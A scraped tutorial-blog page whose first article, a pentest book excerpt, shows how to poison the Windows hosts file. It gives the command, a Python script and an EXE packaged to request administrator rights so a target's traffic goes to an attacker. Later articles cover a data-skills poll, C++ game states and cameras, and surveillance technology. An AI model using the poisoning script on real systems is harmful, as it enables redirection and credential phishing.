How-To Tutorials


Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details. Hackers or attackers lure victims into sharing their personal details by sending them e-mails that appear to come from popular organizations. In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, corrupt Domain Name System (DNS) data is injected into the DNS resolver's cache. This causes the name server to return an incorrect record, and can result in traffic being directed to the attacker's machine. This article is an excerpt taken from Python For Offensive PenTest, written by Hussam Khrais.

Password phishing – DNS poisoning

One of the easiest ways to manipulate the direction of traffic remotely is to play with DNS records. Each operating system contains a hosts file in order to statically map hostnames to specific IP addresses. The hosts file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the hosts file in the Windows operating system, where it is located under C:\Windows\System32\drivers\etc. If you read the description inside the file, you will see that each entry should be located on a separate line, with the IP address placed first and the hostname following after at least one space.

Now, let's see the traffic on the packet level:

1. Open Wireshark on the target machine and start the capture.
2. Filter on the attacker's IP address, 10.10.10.100, and click on Apply. This shows us the traffic before poisoning the DNS records.
3. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system performs a DNS lookup behind the scenes and we get the real IP address.

Now, notice what happens after DNS poisoning. Close all the windows except the one where Wireshark is running. Keep in mind that we need admin privileges to modify the hosts file; even when logged in as an admin, you should explicitly right-click the command prompt and run it as administrator.

1. Navigate to the directory where the hosts file is located, execute dir, and you will see the hosts file.
2. Run type hosts to see the original contents.
3. Append our record with the following command, where 10.10.10.100 is the IP address of our Kali machine, so that once the target browses to google.jo, it is redirected to the attacker machine:

echo 10.10.10.100 www.google.jo >> hosts

4. Verify the change by running type hosts again.
5. After modifying a DNS record, it's always a good idea to flush the DNS cache, just to make sure that we will use the updated record:

ipconfig /flushdns

Now, watch what happens after the DNS poisoning. Open the browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that in Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo, because the DNS resolution for google.jo is now 10.10.10.100.
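The Wireshark capture is how the excerpt confirms the redirect. As an extra check that is not part of the original walkthrough, you can also ask the operating system's resolver directly from Python on the target; since resolution consults the freshly modified hosts file, it should return the attacker's address:

import socket

# After the hosts file is modified and the DNS cache is flushed,
# the OS resolver should hand back the poisoned address for the name.
resolved = socket.gethostbyname("www.google.jo")
print(resolved)  # expected to print 10.10.10.100 in our lab setup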
We will stop the capture and recover the original hosts file, placing the clean copy back in the drivers\etc folder. Then, let's flush the poisoned DNS cache by running:

ipconfig /flushdns

Open the browser again; we should reach the real https://www.google.jo/?gws_rd=ssl now. Now we are good to go!

Using a Python script

Now we'll automate the same steps, but this time via a Python script. Open the script and enter the following code:

# Python For Offensive PenTest
# DNS_Poisoning

import subprocess
import os

# Change the working directory to ..\drivers\etc, where the hosts file is located on Windows
os.chdir(r"C:\Windows\System32\drivers\etc")

# Append this line to the hosts file, redirecting traffic going to google.jo to 10.10.10.100
command = "echo 10.10.10.100 www.google.jo >> hosts"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

# Flush the cached DNS, to make sure that new sessions will take the new DNS record
command = "ipconfig /flushdns"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

The first thing we do is change our current working directory to the one containing the hosts file, using the os library. Then, using subprocess, we append a static DNS record pointing www.google.jo to 10.10.10.100: the Kali IP address. In the last step, we flush the DNS cache.

We can now save the file and export the script as an EXE. Remember that we need the target to execute it as admin. To do that, in the setup file for py2exe, we add a new line, as follows:

...
windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}],
...

This new option specifies that when the target executes the EXE file, Windows will ask to elevate the privileges to administrator. Let's run the setup file and start a new capture. Copy the EXE file onto the desktop; notice the little shield on the icon, indicating that this file needs admin privileges, which gives us exactly the result of running as admin. Run the file and verify that the hosts file gets modified: you will see that our line has been added. Now, open a new session to check whether we get the redirection. Start a new capture and browse with Firefox. As you will see, the DNS lookup for google.jo points to our IP address, 10.10.10.100.

We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out Python For Offensive PenTest to learn how to hack passwords and perform privilege escalation on Windows with practical examples.

12 common malware types you should know
Getting started with Digital forensics using Autopsy
5 pen testing rules of engagement: What to consider while performing Penetration testing


What are data professionals planning to learn this year? Python, deep learning, yes. But also...

Amey Varangaonkar
14 Jun 2018
4 min read
One thing that every data professional absolutely dreads is the day their skills are no longer relevant in the market. In an ever-changing tech landscape, one must be constantly on the lookout for the most relevant, industrially-accepted tools and frameworks. This is applicable everywhere - from application and web developers to cybersecurity professionals. Data professionals are no exception, as new ways and means to extract actionable insights from raw data are being discovered almost every day.

Gone are the days when data pros stuck to a single language and a framework to work with their data. Frameworks are more flexible now, with multiple dependencies across various tools and languages. Not just that, new domains are being identified where these frameworks can be applied, and how they can be applied varies massively as well. A whole new arena of possibilities has opened up, and with it, a new set of skills and toolkits to work in these domains has been unlocked.

What's the next big thing for data professionals?

We recently polled thousands of data professionals as part of our Skill-Up program, and got some very interesting insights into what they think the future of data science looks like. We asked them what they were planning to learn in the next 12 months. The following word cloud is the result of their responses, weighted by the frequency of the tools they chose:

What data professionals are planning on learning in the next 12 months

Unsurprisingly, Python comes out on top as the language many data pros want to learn in the coming months. With its general-purpose nature and innumerable applications across various use cases, Python's sky-rocketing popularity is the reason everybody wants to learn it.

Machine learning and AI are finding significant applications in the web development domain today. They are revolutionizing customers' digital experience through conversational UIs or chatbots. Not just that, smart machine learning algorithms are being used to personalize websites and their UX. With all these reasons, who wouldn't want to learn JavaScript as an important tool to have in their data science toolkit? Add to that the trending web dev framework Angular, and you have all the tools to build smart, responsive front-end web applications.

We also saw data professionals taking an active interest in the mobile and cloud domains. They aim to learn Kotlin and combine its power with data science tools for developing smarter and more intelligent Android apps. When it comes to the cloud, Microsoft's Azure platform has introduced many built-in machine learning capabilities, as well as a workbench for data scientists to develop effective, enterprise-grade models. Data professionals also prefer Docker containers to run their applications seamlessly, and hence the need to learn it seems to be quite high.

Has machine learning with JavaScript caught your interest? Don't worry, we've got you covered - check out Hands-on Machine Learning with JavaScript for a practical, hands-on coverage of the essential machine learning concepts using the leading web development language.

With crypto's popularity through the roof (sadly, we can't say the same about Bitcoin's price), data pros see Blockchain as a valuable skill. Building secure, decentralized apps is on the agenda for many, perhaps. Cloud, Big Data, and Artificial Intelligence are some of the other domains that the data pros find interesting, and feel worth skilling up in.
Work-related skills that data pros want to learn

We also asked data professionals what skills they wanted to learn in the near future that could help them do their daily jobs more effectively. The following word cloud of their responses paints a pretty clear picture:

Valuable skills data professionals want to learn for their everyday work

As machine learning and AI go mainstream, so do their applications in mainstream domains - often resulting in complex problems. Well, there's deep learning, and specifically neural networks, to tackle these problems, and these are exactly the skills data pros want to master in order to excel at their work.

Data pros want to learn Machine Learning in Python. Do you? Here's a useful resource for you to get started - check out Python Machine Learning, Second Edition today!

So, there it is! What are the tools, languages or frameworks that you are planning to learn in the coming months? Do you agree with the results of the poll? Do let us know.

What are web developers favorite front-end tools? Packt's Skill Up report reveals all
Data cleaning is the worst part of data analysis, say data scientists
15 Useful Python Libraries to make your Data Science tasks Easier


Building C++ game play engines in finite state machine pattern [Tutorial]

Amarabha Banerjee
14 Jun 2018
20 min read
One of the most important aspects of game development is creating game states, which help with different tasks such as controlling game flow and managing different game windows. In this article, we are going to show you how you can create gameplay systems with C++ that will help you manage game states and control different game functionalities efficiently.

We use game states in many different ways: for example, to control the game flow, to handle the different ways characters can act and react, even for simple menu navigation. Needless to say, states are an important requirement for a strong and manageable code base. There are many different types of state machines; the one we will focus on in this section is the Finite State Machine (FSM) pattern. We will be creating an FSM pattern that will help you to create a more generic and flexible state machine. This article is taken from the book Mastering C++ Game Development, written by Mickey Macdonald. The book shows you how you can create interesting and fun-filled games with C++.

There are a few ways we can implement a simple state machine in our game. One way would be to simply use a switch case set up to control the states and an enum structure for the state types. An example of this would be as follows:

enum PlayerState
{
    Idle,
    Walking
};
...
PlayerState currentState = PlayerState::Idle; //A holder variable for the state currently in
...
// A simple function to change states
void ChangeState(PlayerState nextState)
{
    currentState = nextState;
}

void Update(float deltaTime)
{
    ...
    switch(currentState)
    {
        case PlayerState::Idle:
            ... //Do idle stuff
            //Change to next state
            ChangeState(PlayerState::Walking);
            break;
        case PlayerState::Walking:
            ... //Do walking stuff
            //Change to next state
            ChangeState(PlayerState::Idle);
            break;
    }
    ...
}

Using a switch/case like this can be effective for a lot of situations, but it does have some strong drawbacks. What if we decide to add a few more states? What if we decide to add branching and more if conditionals? The simple switch/case we started out with has suddenly become very large and undoubtedly unwieldy. Every time we want to make a change or add some functionality, we multiply the complexity and introduce more chances for bugs to creep in. We can help mitigate some of these issues and provide more flexibility by taking a slightly different approach and using classes to represent our states. Through the use of inheritance and polymorphism, we can build a structure that will allow us to chain together states and provide the flexibility to reuse them in many situations.

Let's walk through how we can implement this in our demo examples, starting with the base class we will inherit from in the future, IState:

...
namespace BookEngine
{
    class IState
    {
    public:
        IState() {}
        virtual ~IState() {}
        // Called when a state enters and exits
        virtual void OnEntry() = 0;
        virtual void OnExit() = 0;
        // Called in the main game loop
        virtual void Update(float deltaTime) = 0;
    };
}

As you can see, this is just a very simple class that has a constructor, a virtual destructor, and three pure virtual functions that each inherited state must override. OnEntry, which will be called as the state is first entered, will only execute once per state change. OnExit, like OnEntry, will only be executed once per state change and is called when the state is about to be exited. The last function is the Update function; this will be called once per game loop and will contain much of the state's logic.
Although this seems very simple, it gives us a great starting point to build more complex states. Now let's implement this basic IState class in our examples and see how we can use it for one of the common needs of a state machine: creating game states.

First, we will create a new class called GameState that will inherit from IState. This will be the new base class for all the states our game will need. The GameState.h file consists of the following:

#pragma once
#include <BookEngine\IState.h>

class GameState : BookEngine::IState
{
public:
    GameState();
    ~GameState();
    //Our overrides
    virtual void OnEntry() = 0;
    virtual void OnExit() = 0;
    virtual void Update(float deltaTime) = 0;
    //Added specialty function
    virtual void Draw() = 0;
};

The GameState class is very much like the IState class it inherits from, except for one key difference. In this class, we add a new virtual method, Draw(), that all classes inheriting from GameState will now have to implement. Each time we use IState and create a new specialized base class, player state, menu state, and so on, we can add these new functions to customize it to the requirements of the state machine. This is how we use inheritance and polymorphism to create more complex states and state machines.

Continuing with our example, let's now create a new GameState. We start by creating a new class called GameWaiting that inherits from GameState. To make it a little easier to follow, I have grouped all of the new GameState inherited classes into one set of files, GameStates.h and GameStates.cpp. The GameStates.h file will look like the following:

#pragma once
#include "GameState.h"

class GameWaiting : GameState
{
    virtual void OnEntry() override;
    virtual void OnExit() override;
    virtual void Update(float deltaTime) override;
    virtual void Draw() override;
};

class GameRunning : GameState
{
    virtual void OnEntry() override;
    virtual void OnExit() override;
    virtual void Update(float deltaTime) override;
    virtual void Draw() override;
};

class GameOver : GameState
{
    virtual void OnEntry() override;
    virtual void OnExit() override;
    virtual void Update(float deltaTime) override;
    virtual void Draw() override;
};

Nothing new here; we are just declaring the functions for each of our GameState classes. Now, in our GameStates.cpp file, we can implement each individual state's functions as described in the preceding code:

#include "GameStates.h"

void GameWaiting::OnEntry()
{
    ... //Called when entering the GameWaiting state
    ...
}

void GameWaiting::OnExit()
{
    ... //Called when exiting the GameWaiting state
    ...
}

void GameWaiting::Update(float deltaTime)
{
    ... //Called each game loop while in the GameWaiting state
    ...
}

void GameWaiting::Draw()
{
    ... //Called when drawing the GameWaiting state
    ...
}

...
//Other GameState implementations
...

For the sake of page space, I am only showing the GameWaiting implementation, but the same goes for the other states. Each one will have its own unique implementation of these functions, which allows you to control the code flow and implement more states as necessary without creating a hard-to-follow maze of code paths. Now that we have our states defined, we can implement them in our game. Of course, we could go about this in many different ways.
We could follow the same pattern that we did with our screen system and implement a GameState list class, a definition of which could look like the following:

class GameState;

class GameStateList
{
public:
    GameStateList(IGame* game);
    ~GameStateList();

    GameState* GoToNext();
    GameState* GoToPrevious();

    void SetCurrentState(int nextState);
    void AddState(GameState* newState);
    void Destroy();

    GameState* GetCurrent();

protected:
    IGame* m_game = nullptr;
    std::vector<GameState*> m_states;
    int m_currentStateIndex = -1;
};

Or we could simply use the GameState classes we created with a simple enum and a switch case. The use of the state pattern allows for this flexibility.

Working with cameras

At this point, we have discussed a good amount about the structure of systems and can now move on to designing ways of interacting with our game and 3D environment. This brings us to an important topic: the design of virtual camera systems. A camera is what provides us with a visual representation of our 3D world. It is how we immerse ourselves and it provides us with feedback on our chosen interactions. In this section, we are going to cover the concept of a virtual camera in computer graphics.

Before we dive into writing the code for our camera, it is important to have a strong understanding of how, exactly, it all works. Let's start with the idea of being able to navigate around the 3D world. In order to do this, we need to use what is referred to as a transformation pipeline. A transformation pipeline can be thought of as the steps that are taken to transform all objects and points relative to the position and orientation of a camera viewpoint. The following is a simple diagram that details the flow of a transformation pipeline.

Beginning with the first step in the pipeline, local space: when a mesh is created, it has a local origin of 0x, 0y, 0z. This local origin is typically located either in the center of the object or, in the case of some player characters, at the center of the feet. All points that make up that mesh are then based on that local origin. When talking about a mesh that has not been transformed, we refer to it as being in local space. The preceding image shows the gnome mesh in a model editor; this is what we would consider local space.

In the next step, we want to bring the mesh into our environment, the world space. In order to do this, we have to multiply our mesh points by what is referred to as a model matrix. This will then place the mesh in world space, which sets all the mesh points to be relative to a single world origin. It's easiest to think of world space as being the description of the layout of all the objects that make up your game's environment. Once meshes have been placed in world space, we can start to do things such as compare distances and angles. A great example of this step is when placing game objects in a world/level editor; this is creating a description of the model's mesh in relation to other objects and a single world origin (0,0,0). We will discuss editors in more detail in the next chapter.

Next, in order to navigate this world space, we have to rearrange the points so that they are relative to the camera's position and orientation. To accomplish this, we perform a few simple operations. The first is to translate the objects to the origin. First, we would move the camera from its current world coordinates (in the following example figure, 20 on the x axis, 2 on the y axis, and -15 on the z axis) to the world origin, or 0,0,0.
We can then map the objects by subtracting the camera's position, that is, the values used to translate the camera object, which in this case would be -20, -2, 15. So if our game object started out at 10.5 on the x axis, 1 on the y axis, and -20 on the z axis, the newly translated coordinates would be -9.5, -1, -5. The last operation is to rotate the camera to face the desired direction; in our current case, that would be pointing down the -z axis. For the following example, that would mean rotating the object points by -90 degrees, making the example game object's new position 5, -1, -9.5. These operations combine into what is referred to as the view matrix.

Before we go any further, I want to briefly cover some important details when it comes to working with matrices, in particular, handling matrix multiplication and the order of operations. When working with OpenGL, all matrices are defined in a column-major layout. The opposite is the row-major layout, found in other graphics libraries such as Microsoft's DirectX. The following is the layout for column-major view matrices, where U is the unit vector pointing up, F is our vector pointing forward, R is the right vector, and P is the position of the camera.

When constructing a matrix with a combination of translations and rotations, such as the preceding view matrix, you cannot, generally, just stick the rotation and translation values into a single matrix. In order to create a proper view matrix, we need to use matrix multiplication to combine two or more matrices into a single final matrix. Remembering that we are working with column-major notation, the order of the operations is therefore right to left. This is important since, using the orientation (R) and translation (T) matrices, if we say V = T x R, this would produce an undesired effect, because this would first rotate the points around the world origin and then move them to align to the camera position as the origin. What we want is V = R x T, where the points would first align to the camera as the origin and then apply the rotation. In a row-major layout, this is the other way around, of course.

The good news is that we do not necessarily need to handle the creation of the view matrix manually. Older versions of OpenGL and most modern math libraries, including GLM, have an implementation of a lookAt() function. Most take a version of camera position, target or look position, and the up direction as parameters, and return a fully created view matrix. We will be looking at how to use the GLM implementation of the lookAt() function shortly, but if you want to see the full code implementation of the ideas described just now, check out the source code of GLM, which is included in the project source repository.

Continuing through the transformation pipeline, the next step is to convert from eye space to homogeneous clip space. This stage will construct a projection matrix. The projection matrix is responsible for a few things. First is to define the near and far clipping planes. This is the visible range along the defined forward axis (usually z). Anything that falls in front of the near distance and anything that falls past the far distance is considered out of range. Any geometrical objects that are on the outside of this range will be clipped (removed) from the pipeline in a later step. Second is to define the Field of View (FOV). Despite the name, the field of view is not a field but an angle.
For the FOV, we actually only specify the vertical range; most modern games use 66 or 67 degrees for this. The horizontal range will be calculated for us by the matrix once we provide the aspect ratio (how wide compared to how high). To demonstrate, a 67 degree vertical angle on a display with a 4:3 aspect ratio would have a FOV of 89.33 degrees (67 * 4/3 = 89.33).

These two steps combine to create a volume that takes the shape of a pyramid with the top chopped off. This created volume is referred to as the view frustum. Any of the geometry that falls outside of this frustum is considered to be out of view. The following diagram illustrates what the view frustum looks like.

You might note that there is more visible space available at the end of the frustum than in the front. In order to properly display this on a 2D screen, we need to tell the hardware how to calculate the perspective. This is the next step in the pipeline. The larger, far end of the frustum will be pushed together creating a box shape. The collection of objects visible at this wide end will also be squeezed together; this will provide us with a perspective view. To understand this, imagine the phenomenon of looking along a straight stretch of railway tracks. As the tracks continue into the distance, they appear to get smaller and closer together.

The next step in the pipeline, after defining the clipping space, is to use what is called the perspective division to normalize the points into a box shape with the dimensions of (-1 to 1, -1 to 1, -1 to 1). This is referred to as the normalized device space. By normalizing the dimensions into unit size, we allow the points to be multiplied to scale up or down to any viewport dimensions.

The last major step in the transformation pipeline is to create the 2D representation of the 3D that will be displayed. To do this, we flatten the normalized device space with the objects further away being drawn behind the objects that are closer to the camera (draw depth). The dimensions are scaled from the X and Y normalized values into actual pixel values of the viewport. After this step, we have a 2D space referred to as the Viewport space.

That completes the transformation pipeline stages. With that theory covered, we can now shift to implementation and write some code. We are going to start by looking at the creation of a basic, first person 3D camera, which means we are looking through the eyes of the player's character. Let's start with the camera's header file, Camera3D.h in the source code repository:

...
#include <glm/glm.hpp>
#include <glm/gtc/matrix_transform.hpp>
...

We start with the necessary includes. As I just mentioned, GLM includes support for working with matrices, so we include both glm.hpp and the matrix_transform.hpp to gain access to GLM's lookAt() function:

...
public:
    Camera3D();
    ~Camera3D();

    void Init(glm::vec3 cameraPosition = glm::vec3(4,10,10),
              float horizontalAngle = -2.0f,
              float verticalAngle = 0.0f,
              float initialFoV = 45.0f);

    void Update();

Next, we have the public accessible functions for our Camera3D class. The first two are just the standard constructor and destructor. We then have the Init() function. We declare this function with a few defaults provided for the parameters; this way if no values are passed in, we will still have values to calculate our matrices in the first update call. That brings us to the next function declared, the Update() function.
This is the function that the game engine will call each loop to keep the camera updated:

glm::mat4 GetView() { return m_view; };
glm::mat4 GetProjection() { return m_projection; };
glm::vec3 GetForward() { return m_forward; };
glm::vec3 GetRight() { return m_right; };
glm::vec3 GetUp() { return m_up; };

After the Update() function, there is a set of five getter functions to return both the View and Projection matrices, as well as the camera's forward, up, and right vectors. To keep the implementation clean and tidy, we can simply declare and implement these getter functions right in the header file:

void SetHorizontalAngle(float angle) { m_horizontalAngle = angle; };
void SetVerticalAngle(float angle) { m_verticalAngle = angle; };

Directly after the set of getter functions, we have two setter functions. The first will set the horizontal angle, the second will set the vertical angle. This is useful for when the screen size or aspect ratio changes:

void MoveCamera(glm::vec3 movementVector) { m_position += movementVector; };

The last public function in the Camera3D class is the MoveCamera() function. This simple function takes in a vector 3, then cumulatively adds that vector to the m_position variable, which is the current camera position:

...
private:
    glm::mat4 m_projection;
    glm::mat4 m_view; // Camera matrix

For the private declarations of the class, we start with two glm::mat4 variables. A glm::mat4 is the datatype for a 4x4 matrix. We create one for the view or camera matrix and one for the projection matrix:

    glm::vec3 m_position;
    float m_horizontalAngle;
    float m_verticalAngle;
    float m_initialFoV;

Next, we have a single vector 3 variable to hold the position of the camera, followed by three float values—one for the horizontal and one for the vertical angles, as well as a variable to hold the field of view:

    glm::vec3 m_right;
    glm::vec3 m_up;
    glm::vec3 m_forward;

We then have three more vector 3 variable types that will hold the right, up, and forward values for the camera object. Now that we have the declarations for our 3D camera class, the next step is to implement any of the functions that have not already been implemented in the header file. There are only two functions that we need to provide, the Init() and the Update() functions. Let's begin with the Init() function, found in the Camera3D.cpp file:

void Camera3D::Init(glm::vec3 cameraPosition,
                    float horizontalAngle,
                    float verticalAngle,
                    float initialFoV)
{
    m_position = cameraPosition;
    m_horizontalAngle = horizontalAngle;
    m_verticalAngle = verticalAngle;
    m_initialFoV = initialFoV;
    Update();
}
...

Our Init() function is straightforward; all we are doing in the function is taking in the provided values and setting them to the corresponding variables we declared. Once we have set these values, we simply call the Update() function to handle the calculations for the newly created camera object:

...
void Camera3D::Update()
{
    m_forward = glm::vec3(
        glm::cos(m_verticalAngle) * glm::sin(m_horizontalAngle),
        glm::sin(m_verticalAngle),
        glm::cos(m_verticalAngle) * glm::cos(m_horizontalAngle)
    );

The Update() function is where all of the heavy lifting of the class is done. It starts out by calculating the new forward for our camera. This is done with a simple formula leveraging GLM's cosine and sine functions. What is occurring is that we are converting from spherical coordinates to Cartesian coordinates so that we can use the value in the creation of our view matrix.
    m_right = glm::vec3(
        glm::sin(m_horizontalAngle - 3.14f / 2.0f),
        0,
        glm::cos(m_horizontalAngle - 3.14f / 2.0f)
    );

After we calculate the new forward, we then calculate the new right vector for our camera, again using a simple formula that leverages GLM's sine and cosine functions:

    m_up = glm::cross(m_right, m_forward);

Now that we have the forward and right vectors calculated, we can use GLM's cross-product function to calculate the new up vector for our camera. It is important that these three steps happen every time the camera changes position or rotation, and before the creation of the camera's view matrix:

    float FoV = m_initialFoV;

Next, we specify the FOV. Currently, I am just setting it back to the initial FOV specified when initializing the camera object. This would be the place to recalculate the FOV if the camera was, say, zoomed in or out (hint: mouse scroll could be useful here):

    m_projection = glm::perspective(glm::radians(FoV), 4.0f / 3.0f, 0.1f, 100.0f);

Once we have the field of view specified, we can then calculate the projection matrix for our camera. Luckily for us, GLM has a very handy function called glm::perspective(), which takes in a field of view in radians, an aspect ratio, the near clipping distance, and a far clipping distance, and will then return a created projection matrix for us. Since this is an example, I have specified a 4:3 aspect ratio (4.0f/3.0f) and a clipping space of 0.1 units to 100 units directly. In production, you would ideally move these values to variables that could be changed during runtime:

    m_view = glm::lookAt(
        m_position,
        m_position + m_forward,
        m_up
    );
}

Finally, the last thing we do in the Update() function is to create the view matrix. As I mentioned before, we are fortunate that the GLM library supplies a lookAt() function to abstract all the steps we discussed earlier in the section. This lookAt() function takes three parameters. The first is the position of the camera. The second is a vector value of where the camera is pointed, or looking at, which we provide by doing a simple addition of the camera's current position and its calculated forward. The last parameter is the camera's current up vector which, again, we calculated previously. Once finished, this function will return the newly updated view matrix to use in our graphics pipeline.

We learned to create a simple FSM-based game engine with C++. Check out the book Mastering C++ Game Development to learn high-end game development with advanced C++17 programming techniques.

How AI is changing game development
How to use arrays, lists, and dictionaries in Unity for 3D game development
Unity 2D & 3D game kits simplify Unity game development for beginners


Alarming ways governments are using surveillance tech to watch you

Neil Aitken
14 Jun 2018
12 min read
Mapquest, part of the Verizon company, is the second largest provider of mapping services in the world, after Google Maps. It provides advanced cartography services to companies like Snap and Papa John's pizza. The company is about to release an app that users can install on their smartphone. Their new application will record and transmit video images of what's happening in front of your vehicle as you travel. Data can be sent from any phone with a camera – using the most common of tools – a simple mobile data plan, for example. In exchange, you'll get live traffic updates, among other things. Mapquest will use the video image data they gather to provide more accurate and up to date maps to their partners. The real world is changing all the time – roads get added, cities re-route traffic from time to time. The new AI based technology Mapquest employs could well improve the reliability of driverless cars, which have to engage with this ever changing landscape in a safe manner. No one disagrees with safety improvements.

Mapquest's solution is impressive technology. The fact that they can use AI to interpret the images they see and upload the information they receive to update maps is incredible. And, in this regard, the company is just one of the myriad daily news stories which excite and astound us. These stories do, however, often have another side to them which is rarely acknowledged. In the wrong hands, Mapquest's solution could create a surveillance database which tracked people in real time.

Surveillance technology involves the use of data and information products to capture details about individuals. The act of surveillance is usually undertaken with a view to achieving a goal. The principle is simple: the more 'they' know about you, the easier it will be to influence you towards their ends. Surveillance information can be used to find you, apprehend you or, potentially, to change your mind, without you even realising that you had been watched. Mapquest's innovation is just a single example of surveillance technology in government hands which has expanded in capability far beyond what most people realise.

Read also: What does the US government know about you? The truth beyond the Facebook scandal

Facebook's share price fell 14% in early 2018 as a result of public outcry related to the Cambridge Analytica announcements the company made. The idea that a private company had allowed detailed information about individuals to be provided to a third party without their consent appeared to genuinely shock and appall people. Technology tools like Mapquest's tracking capabilities and Facebook's profiling techniques are being taken and used by police forces and corporate entities around the world. The reality of current private and public surveillance capabilities is that facilities exist, and are in use, to collect and analyse data on most people in the developed world. The known limits of these services may surprise even those who are on the cutting edge of technology. There are so many examples from all over the world listed below that will genuinely make you want to consider going off grid!

Innovative, ingenious overlords: US companies have a flair for surveillance

The US is the centre for information based technology companies. Much of what they develop is exported as well as used domestically.
The police are using human genome matching to track down criminals and can find 'any family in the country'

There have been two recent examples of police arresting a suspect after using human genome databases to investigate crimes. A growing number of private individuals have now used publicly available services such as 23andMe to sequence their genome (DNA), either to investigate their family tree further or to determine a potential pre-disposition to the gene-based component of a disease. In one example, the Golden State Killer, an ex-cop, was arrested 32 years after the last reported rape in a series of 45 (in addition to 12 murders) which occurred between 1976 and 1986. To track him down, police approached sites like 23andMe with DNA found at crime scenes, established a family match and then progressed the investigation using conventional means. More than 12 million Americans have now used a genetic sequencing service and it is believed that investigators could find a family match for the DNA of anyone who has committed a crime in America. In simple terms, whether you want it or not, law enforcement has the DNA of every individual in the country available to it.

Domain Awareness Centers (DAC) bring the Truman Show to life

The 400,000 residents of Oakland, California discovered in 2012 that they had been the subject of an undisclosed mass surveillance project, by the local police force, for many years. Feeds from CCTV cameras installed in Oakland's suburbs were augmented with weather information feeds, social media feeds and extracted email conversations, as well as a variety of other sources. The scheme began at Oakland's port with Federal funding as part of a national response to the events of 9/11, but was extended to cover the near half million residents of the city. Hundreds of additional video cameras were installed, along with gunshot recognition microphones and some of the other surveillance technologies described in this article. The police force conducting the surveillance had no policy on what information was recorded or for how long it was kept.

Internet connected toys spy on children

The FBI has warned Americans that children's toys connected to the internet 'could put the privacy and safety of children at risk.' Children's toy Hello Barbie was specifically admonished for poor privacy controls as part of the FBI's press release. Internet connected toys could be used to record video of children at any point in the day or, conceivably, to relay a human voice, making it appear to the child that the toy was talking to them.

Oracle suggests Google's Android operating system routinely tracks users' position even when maps are turned off

In Australia, two American companies have been involved in a disagreement about the potential monitoring of Android phones. Oracle accused Google of monitoring users' location (including altitude), even when mapping software is turned off on the device. The tracking is performed in the background of the phone. In Australia alone, Oracle suggested that Google's monitoring could involve around 1GB of additional mobile data every month, costing users nearly half a billion dollars a year, collectively.

Amazon facial recognition in real time helps US law enforcement services

Amazon is providing facial recognition services, which take a feed from public video cameras, to a number of US police forces.
Amazon can match images taken in real time to a database containing 'millions of faces.' Are there any state or federal rules in place to govern police facial recognition? Wired reported that there are 'more or less none.' Amazon's scheme is a trial taking place in Florida. There are at least two other companies offering similar schemes to law enforcement services in the US.

Big glass microphone can help agencies keep an ear on the ground

Project 'Big Glass Microphone' uses the vibrations that the movements of cars (among other things) cause in buried fiber optic telecommunications links. A successful test of the technology has been undertaken on the fiber optic cables which run underground on the Stanford University campus, to record vehicle movements. Fiber optic links now make up the backbone of much data transport infrastructure - the way your phone and computer connect to the internet. Big Glass Microphone as it stands is the first step towards 'invisible' monitoring of people and their assets.

It appears the FBI now has the ability to crack/access any phone

Those in the know suggest that Apple's iPhone is the most secure smart device against government surveillance. In 2016, this was put to the test. The Justice Department came into possession of an iPhone allegedly belonging to one of the San Bernardino shooters and ultimately sued Apple in an attempt to force the company to grant access to it, as part of their investigation. The case was ultimately dropped, leading some to speculate that NAND mirroring techniques were used to gain access to the phone without Apple's assistance, implying that even the most secure phones can now be accessed by the authorities.

Cornell University's lie detecting algorithm

Groundbreaking work by Cornell University will provide 'at a distance' access to information that previously required close personal access to an accused subject. Cornell's solution interprets feeds from a number of video cameras on subjects and analyses the results to judge their heart rate. They believe the system can be used to determine if someone is lying from behind a screen.

University of Southern California can anticipate social unrest with social media feeds

Researchers at the University of Southern California have developed an AI tool to study social media posts and determine whether those writing them are likely to cause social unrest. The software claims to have identified an association between both the volume and the content of tweets and protests turning physical. They can now offer advice to law enforcement on the likelihood of a protest turning violent, so they can be properly prepared based on this information.

The UK, an epicenter of AI progress, is not far behind in tracking people

The UK has a similarly impressive array of tools at its disposal to watch the people that representatives of the country feel may require watching. Given the close levels of cooperation between the UK and US governments, it is likely that many of these UK facilities are shared with the US and other NATO partners.

Project Stingray – fake cell phone/mobile phone 'towers' to intercept communications

Stingray is a brand name for an IMSI (the unique identifier on a SIM card) tracker. These devices 'spoof' real towers, presenting themselves as the closest mobile phone tower, which 'fools' phones into connecting to them. The technology has been used to spy on criminals in the UK, but it is not just the UK government which uses Stingray or its equivalents.
The Washington Post reported in June 2018 that a number of domestically compiled intelligence reports suggest that foreign governments acting on US soil, including China and Russia, have been eavesdropping on the White House using the same technology.

UK developed spyware is being used by authoritarian regimes

Gamma International is a company based in Hampshire, UK, which provided the (notably authoritarian) Egyptian government with a facility to install what was effectively spyware, delivered with a virus, onto computers in their country. Once installed, the software permitted the government to monitor private digital interactions, without the need to engage the phone company or ISP offering those services. Any internet based technology could be tracked, assisting in tracking down individuals who may have negative feelings about the Egyptian government.

Individual arrested when his fingerprint was taken from a WhatsApp picture of his hand

A drug dealer was pictured holding an assortment of pills in the UK two months ago. The image of his hand was used to extract an image of his fingerprint. From that, forensic scientists used by UK police confirmed that officers had arrested the correct person and associated him with the drugs.

AI solutions to speed up evidence processing, including scanning laptops and phones

UK police forces are trying out AI software to speed up processing evidence from digital devices. A dozen departments around the UK are using software, called Cellebrite, which employs AI algorithms to search through data found on devices, including phones and laptops. Cellebrite can recognize images that contain child abuse, accepts feeds from multiple devices to see when multiple owners were in the same physical location at the same time, and can read text from screenshots. Officers can even feed it photos of suspects to see if a picture of them shows up on someone's hard drive.

China takes the surveillance biscuit and may show us a glimpse of the future

